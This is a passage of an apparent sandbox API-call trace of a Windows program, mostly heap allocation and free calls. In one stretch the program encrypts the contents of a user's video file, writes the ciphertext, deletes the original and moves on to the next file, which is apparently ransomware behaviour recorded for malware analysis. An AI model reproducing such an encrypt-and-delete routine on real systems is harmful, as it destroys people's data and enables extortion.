hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0098.925] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.925] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0098.926] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0098.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0098.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0098.927] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.927] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.927] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.927] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca880, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0098.928] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xcaef, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xcaf0) returned 1 [0098.928] CharLowerBuffW (in: lpsz="byte[51953]", cchLength=0xb | out: lpsz="byte[51953]") returned 0xb [0098.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca9b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0098.931] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453c0f8*, pdwDataLen=0x144e538*=0xcaef, dwBufLen=0xcaf0 | out: pbData=0x453c0f8*, pdwDataLen=0x144e538*=0xcaf0) returned 1 [0098.931] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.932] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xcaf0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xcaf0, lpOverlapped=0x0) returned 1 [0098.934] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0098.934] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca4d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0098.934] CryptDestroyKey (hKey=0x41ac740) returned 1 [0098.935] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.935] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.935] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0098.935] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0098.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.935] FreeLibrary (hLibModule=0x756e0000) returned 1 [0098.935] CloseHandle (hObject=0x298) returned 1 [0098.936] CloseHandle (hObject=0x258) returned 1 [0098.938] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf", lpFilePart=0x0) returned 0x3b [0098.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0098.938] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\f0zousspvpnmctc-n.swf")) returned 0x20 [0098.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0098.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0098.939] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2b66ed0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0xeebbe170, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xeebbe170, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xcaef, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="F0zOuSSpVPNmctC-N.swf", cAlternateFileName="F0ZOUS~1.SWF")) returned 0x41ac6c0 [0098.939] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\f0zousspvpnmctc-n.swf")) returned 1 [0098.948] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2b66ed0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0xeebbe170, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xeebbe170, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xcaef, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="F0zOuSSpVPNmctC-N.swf", cAlternateFileName="F0ZOUS~1.SWF")) returned 0 [0098.948] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0098.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0098.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0098.949] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0098.949] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43150f0 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0098.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0098.950] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0098.950] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0098.950] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0098.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0098.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0098.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0098.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0098.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0098.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369e20 | out: hHeap=0x1780000) returned 1 [0098.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0098.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0098.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0098.951] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0098.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0098.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0098.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0098.951] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0098.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0098.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0098.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.952] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\gOxwTO2-sZ.mp4", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b1a42a0, ftCreationTime.dwHighDateTime=0x1d5ea66, ftLastAccessTime.dwLowDateTime=0xdc3b0be0, ftLastAccessTime.dwHighDateTime=0x1d5ea53, ftLastWriteTime.dwLowDateTime=0xdc3b0be0, ftLastWriteTime.dwHighDateTime=0x1d5ea53, nFileSizeHigh=0x0, nFileSizeLow=0xbbf4, dwReserved0=0x10189fc, dwReserved1=0x8, 